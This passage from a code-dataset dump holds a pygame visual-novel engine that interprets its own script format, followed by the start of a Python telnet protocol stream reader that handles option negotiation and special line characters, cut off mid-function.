"tornado.ioloop.web", "line_number": 334, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 334, "usage_type": "name"}, {"api_name": "tornado.ioloop.web.HTTPError", "line_number": 371, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 371, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 361, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 361, "usage_type": "name"}, {"api_name": "tornado.ioloop.web.HTTPError", "line_number": 406, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 406, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 388, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 388, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 439, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 439, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 479, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 459, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 459, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 491, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 491, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 510, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 510, "usage_type": "name"}, {"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 529, "usage_type": "call"}, {"api_name": "iceprod.server.documentation.load_doc", "line_number": 530, "usage_type": "call"}, {"api_name": "iceprod.server.documentation", "line_number": 530, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 535, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 535, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 565, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 565, "usage_type": "name"}, {"api_name": "iceprod.core.jsonUtil.json_encode", "line_number": 608, "usage_type": "call"}]} +{"seq_id": "465332386", "text": "import linecache\nimport os\nfrom ast import literal_eval\n\nimport mutagen.mp3\nimport pygame\nfrom pygame.rect import Rect\n\nimport utils.crypto as crypto\nfrom utils.action import Dissolve, Fade, Translate\nfrom utils.sprite import Sprite, Group\nfrom utils.text import Text\n\n'''important'''\nfrom utils.character import Character\n\n_script = \"assets/script.wfpy\"\n_img = \"assets/img/\"\n_scene = _img + \"scene/\"\n_bg = _scene + \"bg/\"\n_music = \"assets/music/\"\n_font = \"assets/fonts/CoconRegular.otf\"\n\n_lorem = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et \" \\\n \"dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip \" \\\n \"ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu \" \\\n \"fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \" \\\n \"mollit anim id est laborum.\"\n\nframe_size = Rect(0, 0, 1920, 1080)\n\nrecall = []\n\n\ndef get_line(i):\n return linecache.getline(_script, i)[:-1]\n # return crypto.decode_script(\"assets/script\", i)\n\n\nclass GameScreen:\n def __init__(self, core, win_size):\n self.core = core\n self.render = pygame.display.set_mode((win_size.w, win_size.h), pygame.RESIZABLE)\n\n self.cdict = {} # Characters dict\n self.ldict = {} # Label dict\n self.vdict = {} # Var dict\n\n # awhile\n self.spacing = 0\n\n # later from saves\n self.next = True\n self.i = 1\n self.tabs = 0\n self.depth = 0\n\n self.lines = 1\n with open(_script) as f:\n self.lines = sum(1 for line in f)\n\n self.panel = Sprite(crypto.decode_img(_img + \"panel\"))\n self.remove_file(_img + \"panel.png\")\n\n self.panel.set_alpha(.7)\n self.panel.scale(1920, 256)\n self.panel.set_midbottom(1920 / 2, 1080)\n\n self.action_pull = []\n self.group = Group()\n\n self.text = Text(_font, 36, (0, 0, 0), pygame.Rect(400, 930, 1450, 140))\n self.text.set_text(\"\") #_lorem\n\n self.name = Text(_font, 36, (0, 0, 0), pygame.Rect(400, 830, 300, 50))\n\n self.resize(win_size)\n\n print()\n\n def remove_file(self, path):\n if not self.core.debug:\n os.remove(path)\n\n def act(self):\n for event in self.core.events:\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n self.next = True\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n self.next = True\n\n if self.next:\n self.i, self.tabs, self.depth = self.script_analysis(self.i, self.tabs, self.depth)\n self.next = False\n\n for action in self.action_pull:\n if not action.s_make:\n self.action_pull.remove(action)\n action.make()\n\n def script_analysis(self, i, tabs, depth):\n global spr\n global recall\n\n while i < self.lines:\n line = get_line(i)\n i += 1\n if not line == \"\":\n j = i\n tail = \" \"*6\n while int(j) > 0:\n j /= 10\n tail = tail[0:-1]\n print(\"##\" + str(i-1), end=tail)\n if line[:tabs * 4] == \" \" * tabs * 4:\n print(\"|\" + str(tabs) + \"| \" + line[tabs * 4:])\n else:\n print(line + \"\\n~~ INCORRECT SYNTAX WARNING! IF \\\"~~ CHECK\\\" IGNORE THIS\")\n\n # can be used only on first level\n if line[:6] == \"define\":\n exec(line[7:], globals(), self.cdict)\n # self.cdict[list(self.cdict.keys())[-1]].print()\n\n # can be used only on first level\n elif line[:3] == \"var\":\n exec(line[4:], globals(), self.vdict)\n\n # can be used only on first level\n # [tabs * 4:] - important\n elif line[tabs * 4:][:5] == \"label\":\n self.ldict.update({line[6:-1]: i})\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:4] == \"call\":\n recall.append([i, tabs, depth, False])\n i, tabs, depth = self.script_analysis(self.ldict[line[tabs * 4:][5:]], 1, depth + 1)\n\n print(\"~check\")\n print(tabs)\n print(line[:tabs * 4] != \" \" * tabs * 4, end=\"\\n\\n\")\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n\n elif line[tabs * 4:][:2] == \"if\":\n other = True\n if eval(line[tabs * 4:][3:-1], globals(), self.vdict):\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n rebreak = False\n while True:\n if get_line(i)[tabs * 4:][:4] == \"elif\":\n line = get_line(i)\n i += 1\n\n if eval(line[tabs * 4:][5:-1], globals(), self.vdict):\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n rebreak = True # todo real break\n\n other = False\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n else:\n break\n\n if rebreak:\n break\n\n if get_line(i)[tabs * 4:][:4] == \"else\":\n line = get_line(i)\n i += 1\n\n if other:\n recall.append([i, tabs, depth, True])\n i, tabs, depth = self.script_analysis(i, tabs + 1, depth + 1)\n\n # if there is a script further\n if line[:tabs * 4] != \" \" * tabs * 4:\n break\n else:\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:4] == \"elif\" or line[tabs * 4:][:4] == \"else\":\n # pass\n line = get_line(i)\n while line[:4] == \" \" * 4 or not line:\n i += 1\n line = get_line(i)\n\n elif line[tabs * 4:][:5] == \"scene\":\n print(\" \" * 8 + line[tabs * 4:][6:] + \".png\")\n bg = Sprite(crypto.decode_img(_bg + line[tabs * 4:][6:]))\n self.remove_file(_scene + line[tabs * 4:][6:] + \".png\")\n bg.scale(1920, 1080)\n bg.set_center(1920 / 2, 1080 / 2)\n\n line = get_line(i)\n i += 1\n if line[tabs * 4:][:4] == \"with\":\n if line[tabs * 4:][5:9] == \"fade\":\n self.action_pull.append(Fade(self.group, float(line[tabs * 4:][10:-1])))\n if line[tabs * 4:][5:13] == \"dissolve\":\n bg.set_alpha(0)\n self.action_pull.append(Dissolve(bg, float(line[tabs * 4:][14:-1])))\n\n # добавление должно быть после начала действия\n self.group.add(bg)\n\n elif line[tabs * 4:][:4] == \"show\":\n print(\" \" * 8 + line[tabs * 4:][5:] + \".png\")\n # print(self.group.sprites())\n\n update = False\n for key in self.cdict.keys():\n if line[tabs * 4:][5:5 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n spr.update_img(crypto.decode_img(_scene + key + \"/\" + line[tabs * 4:][5:]))\n self.remove_file(_scene + key + \"/\" + line[tabs * 4:][5:] + \".png\")\n update = True\n if not update:\n spr = Sprite(crypto.decode_img(_scene + key + \"/\" + line[tabs * 4:][5:]), key)\n self.remove_file(_scene + key + \"/\" + line[tabs * 4:][5:] + \".png\")\n spr.scale(spr.get_base_w(), spr.get_base_h())\n # spr.set_midbottom_pct(.5, 1)\n # spr.set_bottomright(1920, 1080)\n # self.spacing += .2\n # spr.zoom(1.3)\n # spr.draw_debug(True)\n self.group.add(spr)\n\n if get_line(i)[tabs * 4:][:2] == \"at\":\n line = get_line(i)\n i += 1\n if line[tabs * 4:][3:] == \"left\":\n spr.set_bottomleft(0, 1080)\n elif line[tabs * 4:][3:] == \"right\":\n spr.set_bottomright(1920, 1080)\n else:\n spr.set_midbottom_pct(float(line[tabs * 4:][3:]), 1)\n else:\n spr.set_midbottom_pct(.5, 1)\n\n if get_line(i)[tabs * 4:][:4] == \"zoom\":\n line = get_line(i)\n i += 1\n # spr.zoom(line[5:])\n spr.zoom(float(line[tabs * 4:][5:]))\n break\n\n if get_line(i)[tabs * 4:][:4] == \"with\":\n line = get_line(i)\n i += 1\n if line[tabs * 4:][5:13] == \"dissolve\":\n spr.set_alpha(0)\n self.action_pull.append(Dissolve(spr, float(line[tabs * 4:][14:-1])))\n\n elif line[tabs * 4:][:9] == \"translate\":\n print(\" \" * 8 + str(self.cdict.keys()))\n for key in self.cdict.keys():\n if line[tabs * 4:][10:10 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n trans_dict = literal_eval(line[tabs * 4:][11 + len(key):])\n self.action_pull.append(Translate(spr, trans_dict[\"x\"], trans_dict[\"t\"]))\n\n elif line[tabs * 4:][:4] == \"hide\":\n for key in self.cdict.keys():\n if line[tabs * 4:][5:5 + len(key)] == key:\n for spr in self.group.sprites():\n if key == spr.tag:\n line = get_line(i)\n i += 1\n if line[tabs * 4:][:4] == \"with\":\n if line[tabs * 4:][5:13] == \"dissolve\":\n self.action_pull.append(Dissolve(spr, float(line[tabs * 4:][14:-1])))\n else:\n spr.kill()\n del spr\n # TODO real delete\n break\n\n elif line[tabs * 4:][:4] == \"play\":\n if line[tabs * 4:][5:10] == \"music\":\n path = crypto.decode_music(_music + line[tabs * 4:][11:])\n pygame.mixer.init(frequency=mutagen.mp3.MP3(path).info.sample_rate)\n self.remove_file(_music + line[tabs * 4:][11:] + \".mp3\")\n print(\" \" * 8 + str(mutagen.mp3.MP3(path).info.sample_rate))\n pygame.mixer.music.load(path)\n pygame.mixer.music.set_volume(.35)\n pygame.mixer.music.play()\n if line[tabs * 4:][5:10] == \"sound\":\n pass\n\n elif line[tabs * 4:][0] == \"#\":\n pass\n\n elif line[tabs * 4:][0] == \"\\\"\":\n print(\" \" * 8 + line[tabs * 4:][1:-1])\n self.name.set_text(\"\")\n self.text.set_text(line[tabs * 4:][1:-1])\n break\n\n else:\n for key in self.cdict.keys():\n if line[tabs * 4:][:len(key)] == key:\n print(\" \" * 8 + \"(\" + self.cdict[key].get_name() + \") \" + line[tabs * 4:][len(key) + 2:-1])\n self.name.set_text(self.cdict[key].get_name())\n self.text.set_text(line[tabs * 4:][len(key) + 2:-1])\n break\n\n # vdict\n\n # skip empty lines\n n = -1\n line = get_line(i + n)\n while not line:\n n += 1\n line = get_line(i + n)\n\n print(\"check\")\n print(tabs)\n print(line[:tabs * 4] != \" \" * tabs * 4, end=\"\\n\\n\")\n if line[:tabs * 4] != \" \" * tabs * 4:\n rec = recall.pop()\n if rec[3]:\n # \"if\"\n i -= 1\n tabs = rec[1]\n depth = rec[2]\n print(\"~~ CHECK\")\n i, tabs, depth = self.script_analysis(i, tabs, depth)\n else:\n # \"label\"\n i = rec[0]\n tabs = rec[1]\n depth = rec[2]\n print(\"~~ CHECK\")\n break\n return i, tabs, depth\n\n def draw(self):\n # print(self.group.sprites())\n\n surface = pygame.Surface((1920, 1080))\n\n self.group.draw(surface)\n self.panel.draw(surface)\n self.text.draw(surface)\n self.name.draw(surface)\n\n surface = pygame.transform.smoothscale(surface, (frame_size.w, frame_size.h))\n self.render.blit(surface, frame_size)\n\n def resize(self, new_size):\n global frame_size\n self.render = pygame.display.set_mode((new_size.w, new_size.h), pygame.RESIZABLE)\n\n # if new_size.w < new_size.h * self.bg.get_base_w() / self.bg.get_base_h():\n # self.bg.scale(int(new_size.h * self.bg.get_base_w() / self.bg.get_base_h()), new_size.h)\n # self.bg.set_topleft(int((new_size.w - self.bg.get_w()) / 2), new_size.h - self.bg.get_h())\n # else:\n # self.bg.scale(new_size.w, int(new_size.w * self.bg.get_base_h() / self.bg.get_base_w()))\n # self.bg.set_topleft(0, new_size.h - self.bg.get_h())\n\n if new_size.w <= new_size.h * 16 / 9:\n frame_size.w = new_size.w\n frame_size.h = int(new_size.w * 9 / 16)\n else:\n frame_size.w = int(new_size.h * 16 / 9)\n frame_size.h = new_size.h\n frame_size.center = (new_size.w / 2, new_size.h / 2)\n", "sub_path": "screens/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 16922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.rect.Rect", "line_number": 30, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "utils.sprite.Sprite", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 62, "usage_type": "name"}, {"api_name": "utils.sprite.Group", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.text.Text", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.text.Text", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 75, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.KEYUP", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 90, "usage_type": "attribute"}, {"api_name": "utils.sprite.Sprite", "line_number": 223, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 223, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 223, "usage_type": "name"}, {"api_name": "utils.action.Fade", "line_number": 232, "usage_type": "call"}, {"api_name": "utils.action.Dissolve", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 249, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.sprite.Sprite", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.crypto.decode_img", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 253, "usage_type": "name"}, {"api_name": "utils.action.Dissolve", "line_number": 287, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.action.Translate", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.action.Dissolve", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.crypto.decode_music", "line_number": 316, "usage_type": "call"}, {"api_name": "utils.crypto", "line_number": 316, "usage_type": "name"}, {"api_name": "pygame.mixer.init", "line_number": 317, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 317, "usage_type": "attribute"}, {"api_name": "mutagen.mp3.mp3.MP3", "line_number": 317, "usage_type": "call"}, {"api_name": "mutagen.mp3.mp3", "line_number": 317, "usage_type": "attribute"}, {"api_name": "mutagen.mp3", "line_number": 317, "usage_type": "name"}, {"api_name": "mutagen.mp3.mp3.MP3", "line_number": 319, "usage_type": "call"}, {"api_name": "mutagen.mp3.mp3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "mutagen.mp3", "line_number": 319, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 320, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 320, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 321, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 321, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 376, "usage_type": "call"}, {"api_name": "pygame.transform.smoothscale", "line_number": 383, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 383, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 388, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 388, "usage_type": "attribute"}]} +{"seq_id": "298487020", "text": "import collections\nimport logging\n\nfrom telnetlib import LINEMODE, NAWS, NEW_ENVIRON, BINARY, SGA, ECHO, STATUS\nfrom telnetlib import TTYPE, TSPEED, LFLOW, XDISPLOC, IAC, DONT, DO, WONT\nfrom telnetlib import WILL, SE, NOP, TM, DM, BRK, IP, AO, AYT, EC, EL, EOR\nfrom telnetlib import GA, SB, LOGOUT, EXOPL, CHARSET, SNDLOC, theNULL\n\nfrom slc import SLC_NOSUPPORT, SLC_CANTCHANGE, SLC_VARIABLE, NSLC\nfrom slc import SLC_DEFAULT, SLC_FLUSHOUT, SLC_FLUSHIN, SLC_ACK\nfrom slc import SLC_SYNCH, SLC_BRK, SLC_IP, SLC_AO, SLC_AYT, SLC_EOR\nfrom slc import SLC_ABORT, SLC_EOF, SLC_SUSP, SLC_EC, SLC_EL, SLC_EW\nfrom slc import SLC_RP, SLC_LNEXT, SLC_XON, SLC_XOFF, SLC_FORW1\nfrom slc import SLC_FORW2, SLC_MCL, SLC_MCR, SLC_MCWL, SLC_MCWR, SLC_MCBOL\nfrom slc import SLC_MCEOL, SLC_INSRT, SLC_OVER, SLC_ECR, SLC_EWR, SLC_EBOL\nfrom slc import SLC_EEOL, DEFAULT_SLC_TAB, SLC_nosupport, SLC_definition\nfrom slc import _POSIX_VDISABLE, name_slc_command, Forwardmask\n\nfrom teldisp import name_unicode\n\n(EOF, SUSP, ABORT, EOR_CMD) = (\n bytes([const]) for const in range(236, 240))\n(IS, SEND, INFO) = (bytes([const]) for const in range(3))\n(LFLOW_OFF, LFLOW_ON, LFLOW_RESTART_ANY, LFLOW_RESTART_XON) = (\n bytes([const]) for const in range(4))\n(LMODE_MODE, LMODE_FORWARDMASK, LMODE_SLC) = (\n bytes([const]) for const in range(1, 4))\n(LMODE_MODE_REMOTE, LMODE_MODE_LOCAL, LMODE_MODE_TRAPSIG) = (\n bytes([const]) for const in range(3))\n(LMODE_MODE_ACK, LMODE_MODE_SOFT_TAB, LMODE_MODE_LIT_ECHO) = (\n bytes([4]), bytes([8]), bytes([16]))\n\n# see: TelnetStreamReader._default_callbacks\nDEFAULT_IAC_CALLBACKS = (\n (BRK, 'brk'), (IP, 'ip'), (AO, 'ao'), (AYT, 'ayt'), (EC, 'ec'),\n (EL, 'el'), (EOF, 'eof'), (SUSP, 'susp'), (ABORT, 'abort'),\n (NOP, 'nop'), (DM, 'dm'), (GA, 'ga'), (EOR_CMD, 'eor'), )\nDEFAULT_SLC_CALLBACKS = (\n (SLC_SYNCH, 'dm'), (SLC_BRK, 'brk'), (SLC_IP, 'ip'),\n (SLC_AO, 'ao'), (SLC_AYT, 'ayt'), (SLC_EOR, 'eor'),\n (SLC_ABORT, 'abort'), (SLC_EOF, 'eof'), (SLC_SUSP, 'susp'),\n (SLC_EC, 'ec'), (SLC_EL, 'el'), (SLC_EW, 'ew'), (SLC_RP, 'rp'),\n (SLC_LNEXT, 'lnext'), (SLC_XON, 'xon'), (SLC_XOFF, 'xoff'), )\nDEFAULT_EXT_CALLBACKS = (\n (TTYPE, 'ttype'), (TSPEED, 'tspeed'), (XDISPLOC, 'xdisploc'),\n (NEW_ENVIRON, 'env'), (NAWS, 'naws'), (LOGOUT, 'logout'),\n (SNDLOC, 'sndloc',) )\n\ndef escape_iac(buf):\n \"\"\" .. function:: escape_iac(buf : bytes) -> type(bytes)\n :noindex:\n\n Return byte buffer with IAC (\\xff) escaped.\n \"\"\"\n assert isinstance(buf, (bytes, bytearray)), buf\n return buf.replace(IAC, IAC + IAC)\n\nclass Option(dict):\n def __init__(self, name, log=logging):\n \"\"\" .. class:: Option(name : str, log: logging.logger)\n\n Initialize a Telnet Option database for capturing option\n negotation changes to ``log`` if enabled for debug logging.\n \"\"\"\n self.name, self.log = name, log\n dict.__init__(self)\n\n def enabled(self, key):\n \"\"\" Returns True of option is enabled.\"\"\"\n return bool(self.get(key, None) is True)\n\n def __setitem__(self, key, value):\n if value != dict.get(self, key, None):\n descr = ' + '.join([_name_command(bytes([byte]))\n for byte in key[:2]] + [repr(byte)\n for byte in key[2:]])\n self.log.debug('{}[{}] = {}'.format(self.name, descr, value))\n dict.__setitem__(self, key, value)\n __setitem__.__doc__ = dict.__setitem__.__doc__\n\n\nclass TelnetStreamReader:\n \"\"\"\n This class implements a ``feed_byte()`` method that acts as a\n Telnet Is-A-Command (IAC) interpreter. The significance of the\n last byte passed to this method is tested by class instance public\n attributes following the call. A minimal Telnet Service Protocol\n ``data_received`` method should forward each byte, or begin forwarding\n at IAC until ``is_oob`` tests ``True``, and optionally act on\n functions of ``slc_received``.\n \"\"\"\n\n #: a list of system environment variables requested by the server after\n # a client agrees to negotiate NEW_ENVIRON.\n _default_env_request = (\n \"USER HOSTNAME UID TERM COLUMNS LINES DISPLAY LANG SYSTEMTYPE \"\n \"ACCT JOB PRINTER SFUTLNTVER SFUTLNTMODE LC_ALL VISUAL EDITOR \"\n \"LC_COLLATE LC_CTYPE LC_MESSAGES LC_MONETARY LC_NUMERIC LC_TIME\"\n ).split()\n #: Maximum size of sub-negotiation buffer\n SB_MAXSIZE = 2048\n #: Maximum size of Special Linemode Character receive buffer\n SLC_MAXSIZE = 6 * NSLC\n\n @property\n def is_linemode(self):\n \"\"\" If telnet stream appears to be in any linemode, remote or local.\n \"\"\"\n # The default Network Terminal is always in linemode, unless\n # explicitly set False (client sends: WONT, LINEMODE),\n # or implied by server (server sends: WILL ECHO, WILL SGA).\n if self.is_server:\n return self.remote_option.enabled(LINEMODE) or not (\n self.local_option.enabled(ECHO) and\n self.local_option.enabled(SGA))\n # same heuristic is reversed for client point of view (unveried XXX)\n return self.local_option.enabled(LINEMODE) or (\n self.remote_option.enabled(ECHO) and\n self.remote_option.enabled(SGA))\n\n @property\n def linemode(self):\n \"\"\" Linemode instance for stream, or None if stream is in Kludge mode.\n \"\"\"\n # A description of the linemode entered may be tested using boolean\n # instance attributes ``edit``, ``trapsig``, ``soft_tab``, and\n # ``lit_echo``, or simply its __str__() method.\n return (self._linemode if self.is_linemode else None)\n\n @property\n def is_server(self):\n \"\"\" Telnet stream is used for server end. \"\"\"\n return bool(self._server)\n\n @property\n def is_client(self):\n \"\"\" Telnet stream is used for client end.\n \"\"\"\n return bool(not self._server)\n\n @property\n def is_oob(self):\n \"\"\" Last byte processed by ``feed_byte()`` should not be received\n in-band: not duplicated to the client if remote ECHO is enabled,\n and not inserted into an input buffer.\n \"\"\"\n # Values matching special linemode characters (SLC) are inband.\n # Always True if handled by IAC interpreter and any matching callbacks.\n return (self.iac_received or self.cmd_received)\n\n def __init__(self, transport, client=False, server=False, log=logging,\n default_slc_tab=DEFAULT_SLC_TAB):\n \"\"\"\n .. class::TelnetServer(transport, client=False, server=False,\n log=logging, default_slc_tag=DEFAULT_SLC_TAB)\n\n Server and Client streams negotiate about capabilities from different\n perspectives, so the mutually exclusive booleans ``client`` and\n ``server`` (default) indicates which end the protocol is attached to.\n\n Extending or changing protocol capabilities should extend, override,\n or register their own callables, for the local iac, slc, and ext\n callback handlers; mainly those beginning with ``handle``, or by\n registering using the methods beginning with ``set_callback``.\n \"\"\"\n assert not client == False or not server == False, (\n \"Arguments 'client' and 'server' are mutually exclusive\")\n self.log = log\n self.transport = transport\n #: total bytes sent to ``feed_byte()``\n self.byte_count = 0\n #: wether flow control enabled by Transmit-Off (XOFF) (defaults\n # to Ctrl-s), should re-enable Transmit-On (XON) only on receipt\n # of the XON key (Ctrl-q). Or, when unset, any keypress from client\n # re-enables transmission (XON).\n self.xon_any = False\n #: set ``True`` if the last byte sent to ``feed_byte()`` is the\n # beginning of an IAC command (\\xff).\n self.iac_received = False\n #: SLC function value if the last byte sent to ``feed_byte()`` is a\n # matching special line chracter value.\n self.slc_received = False\n #: SLC function values and callbacks are fired for clients in\n # Kludge mode not otherwise capable of negotiating them, providing\n # remote editing facilities for dumb clients, such as with ``nc -T``.\n self.slc_simulated = True\n #: IAC command byte value if the last byte sent to ``feed_byte()`` is\n # part of an IAC command sequence, such as *WILL* or *SB*.\n self.cmd_received = False\n #: True when Flow Control (XON) has been recv until receipt of XOFF.\n self._xmit = True\n #: Sub-negotiation buffer\n self._sb_buffer = collections.deque()\n #: SLC buffer\n self._slc_buffer = collections.deque()\n #: Represents negotiated linemode byte mask if ``is_linemode`` is True.\n self._linemode = Linemode()\n #: True if client acknowledged forwardmask\n self._forwardmask_enabled = False\n #: True if stream is operating in server mode\n self._server = (client in (None, False) or server in (None, True))\n\n self._init_options()\n self._default_callbacks()\n self._default_slc(default_slc_tab)\n\n def feed_byte(self, byte):\n \"\"\" .. method:: feed_byte(byte : bytes)\n\n Feed a single byte into Telnet option state machine.\n \"\"\"\n assert isinstance(byte, (bytes, bytearray)), byte\n assert len(byte) == 1, byte\n self.byte_count += 1\n self._dm_recv = False\n self.slc_received = False\n # list of IAC commands needing 3+ bytes\n iac_mbs = (DO, DONT, WILL, WONT, SB)\n # cmd received is toggled false, unless its a msb.\n self.cmd_received = self.cmd_received in iac_mbs and self.cmd_received\n\n if byte == IAC:\n self.iac_received = (not self.iac_received)\n if not self.iac_received and self.cmd_received == SB:\n # SB buffer recvs escaped IAC values\n self._sb_buffer.append(IAC)\n\n elif self.iac_received and not self.cmd_received:\n # parse 2nd byte of IAC, even if recv under SB\n self.cmd_received = cmd = byte\n if cmd not in iac_mbs:\n # DO, DONT, WILL, WONT are 3-byte commands and\n # SB can be of any length. Otherwise, this 2nd byte\n # is the final iac sequence command byte.\n assert cmd in self._iac_callback, _name_command(cmd)\n self._iac_callback[cmd](cmd)\n self.iac_received = False\n\n elif self.iac_received and self.cmd_received == SB:\n # parse 2nd byte of IAC while while already within\n # IAC SB sub-negotiation buffer, assert command is SE.\n self.cmd_received = cmd = byte\n if cmd != SE:\n self.log.warn('SB buffer interrupted by IAC {}'.format(\n _name_command(cmd)))\n self._sb_buffer.clear()\n else:\n self.log.debug('recv IAC SE')\n # sub-negotiation end (SE), fire handle_subnegotiation\n try:\n self.handle_subnegotiation(self._sb_buffer)\n finally:\n self._sb_buffer.clear()\n self.iac_received = False\n\n elif self.cmd_received == SB:\n # continue buffering of sub-negotiation command.\n self._sb_buffer.append(byte)\n assert len(self._sb_buffer) < self.SB_MAXSIZE\n\n elif self.cmd_received:\n # parse 3rd and final byte of IAC DO, DONT, WILL, WONT.\n cmd, opt = self.cmd_received, byte\n self.log.debug('recv IAC {} {}'.format(\n _name_command(cmd), _name_command(opt)))\n if cmd == DO:\n if self.handle_do(opt):\n self.local_option[opt] = True\n if self.pending_option.enabled(WILL + opt):\n self.pending_option[WILL + opt] = False\n elif cmd == DONT:\n self.handle_dont(opt)\n if self.pending_option.enabled(WILL + opt):\n self.pending_option[WILL + opt] = False\n self.local_option[opt] = False\n elif cmd == WILL:\n if not self.pending_option.enabled(DO + opt) and opt != TM:\n self.log.debug('WILL {} unsolicited'.format(\n _name_command(opt)))\n self.handle_will(opt)\n if self.pending_option.enabled(DO + opt):\n self.pending_option[DO + opt] = False\n if self.pending_option.enabled(DONT + opt):\n self.pending_option[DONT + opt] = False\n elif cmd == WONT:\n self.handle_wont(opt)\n self.pending_option[DO + opt] = False\n self.iac_received = False\n self.cmd_received = (opt, byte)\n\n elif self.pending_option.enabled(DO + TM):\n # IAC DO TM was previously sent; discard all input until\n # IAC WILL TM or IAC WONT TM is received by remote end.\n self.log.debug('discarded by timing-mark: {!r}'.format(byte))\n\n elif (not self.is_linemode and self.slc_simulated # kludge mode,\n ) or (self.remote_option.enabled(LINEMODE)\n and self.linemode.remote): # remote lm + editing,\n # 'byte' is tested for SLC characters\n (callback, slc_name, slc_def) = self._slc_snoop(byte)\n if slc_name is not None:\n self.log.debug('_slc_snoop({!r}): {}, callback is {}.'.format(\n byte, name_slc_command(slc_name),\n callback.__name__ if callback is not None else None))\n if slc_def.flushin:\n # 